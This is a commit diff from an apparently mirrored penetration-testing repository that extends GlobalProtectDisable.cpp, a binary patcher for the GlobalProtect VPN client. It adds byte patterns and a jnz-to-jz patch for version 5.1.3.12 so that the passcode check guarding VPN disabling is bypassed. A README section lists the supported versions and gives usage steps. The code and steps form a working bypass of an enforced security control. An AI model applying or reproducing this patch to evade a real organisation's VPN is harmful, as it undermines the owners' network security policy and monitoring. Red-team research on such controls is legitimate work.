mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-12-22 17:15:06 +01:00
GLobalProtectDisable update.
This commit is contained in:
parent
0dc13a3ab4
commit
e8c3d8dae7
@ -23,12 +23,13 @@
|
||||
using namespace std;
|
||||
|
||||
const wchar_t *processName = L"PanGPA.exe";
|
||||
const size_t PatternsNum = 2;
|
||||
const size_t PatternsNum = 3;
|
||||
const size_t SizeOfReplacingBytes = 2;
|
||||
|
||||
const wchar_t *versionsArray[PatternsNum] = {
|
||||
L"3.1.6.19",
|
||||
L"5.0.3.29"
|
||||
L"5.0.3.29",
|
||||
L"5.1.3.12"
|
||||
};
|
||||
|
||||
//
|
||||
@ -62,13 +63,27 @@ Look for strings such as:
|
||||
"CDisableDialog::CheckPasscode - passcode matched, ok to disable"
|
||||
"CDisableDialog::CheckPasscode - passcode mismatch, deny disabling"
|
||||
*/
|
||||
|
||||
const BYTE patternToFind50329[] = {
|
||||
0x48, 0x83, 0xc1, 0x78, 0xff, 0x15, 0xba, 0xb3, 0x04, 0x00,
|
||||
0x85, 0xc0
|
||||
};
|
||||
|
||||
|
||||
/*
|
||||
.text:000000014009E654 4C 89 B4 24 88 00 00 00 mov [rsp+0A8h+var_20], r14
|
||||
.text:000000014009E65C 4C 89 BC 24 80 00 00 00 mov [rsp+0A8h+var_28], r15
|
||||
.text:000000014009E664 85 D2 test edx, edx
|
||||
.text:000000014009E666 0F 85 8C 00 00 00 jnz loc_14009E6F8
|
||||
^--- This is byte to be patched. -------^
|
||||
.text:000000014009E66C 83 3D 41 E4 34 00 05 cmp cs:dword_1403ECAB4, 5
|
||||
.text:000000014009E673 72 78 jb short loc_14009E6ED
|
||||
.text:000000014009E675 48 8D 4C 24 60 lea rcx, [rsp+0A8h+SystemTime] ; lpSystemTime
|
||||
*/
|
||||
const BYTE patternToFind51312[] = {
|
||||
0x24, 0x88, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xBC, 0x24, 0x80,
|
||||
0x00, 0x00, 0x00, 0x85, 0xD2
|
||||
};
|
||||
|
||||
|
||||
// jne pangpa.7FF621B7D08F
|
||||
const BYTE bytesToBeReplaced31619[SizeOfReplacingBytes] = {
|
||||
@ -90,25 +105,39 @@ const BYTE replacingBytes50329[SizeOfReplacingBytes] = {
|
||||
0x74, 0x49
|
||||
};
|
||||
|
||||
// jnz loc_14009E6F8
|
||||
const BYTE bytesToBeReplaced51312[SizeOfReplacingBytes] = {
|
||||
0x0F, 0x85
|
||||
};
|
||||
|
||||
// jz loc_14009E6F8
|
||||
const BYTE replacingBytes51312[SizeOfReplacingBytes] = {
|
||||
0x0F, 0x84
|
||||
};
|
||||
|
||||
|
||||
const BYTE *patternsArray[PatternsNum] = {
|
||||
patternToFind31619,
|
||||
patternToFind50329
|
||||
patternToFind50329,
|
||||
patternToFind51312
|
||||
};
|
||||
|
||||
const size_t patternsSizes[PatternsNum] = {
|
||||
sizeof(patternToFind31619),
|
||||
sizeof(patternToFind50329)
|
||||
sizeof(patternToFind50329),
|
||||
sizeof(patternToFind51312)
|
||||
};
|
||||
|
||||
const BYTE *patternsToBeReplaced[PatternsNum] = {
|
||||
bytesToBeReplaced31619,
|
||||
bytesToBeReplaced50329
|
||||
bytesToBeReplaced50329,
|
||||
bytesToBeReplaced51312
|
||||
};
|
||||
|
||||
const BYTE *replacingBytes[PatternsNum] = {
|
||||
replacingBytes31619,
|
||||
replacingBytes50329
|
||||
replacingBytes50329,
|
||||
replacingBytes51312
|
||||
};
|
||||
|
||||
|
||||
|
@ -11,6 +11,11 @@
|
||||
|
||||
- **`GlobalProtectDisable.cpp`** - Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode. ([gist](https://gist.github.com/mgeeky/54ac676226a1a4bd9fd8653e24adc2e9))
|
||||
|
||||
Currently supported versions:
|
||||
- 3.1.6.19
|
||||
- 5.0.3.29
|
||||
- 5.1.3.12
|
||||
|
||||
Steps are following:
|
||||
|
||||
1. Launch the application as an Administrator
|
||||
@ -20,7 +25,7 @@
|
||||
5. Enter some random meaningless password
|
||||
|
||||
After those steps - the GlobalProtect will disable itself cleanly.
|
||||
From now on, the GlobalProtect will remain disabled until you reboot the machine (or restart the PanGPA.exe process or PanGPS service).
|
||||
From now on, the GlobalProtect will remain disabled until you reboot the machine (or restart the PanGPA.exe process or PanGPS service).
|
||||
|
||||
- **`impacket-binaries.sh`** - Simple one-liner that downloads all of the Windows EXE impacket binaries put out in [Impacket Binaries](https://github.com/ropnop/impacket_static_binaries) repo. [gist](https://gist.github.com/mgeeky/2f990f14f1e7cf78fce21b8761234604)
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user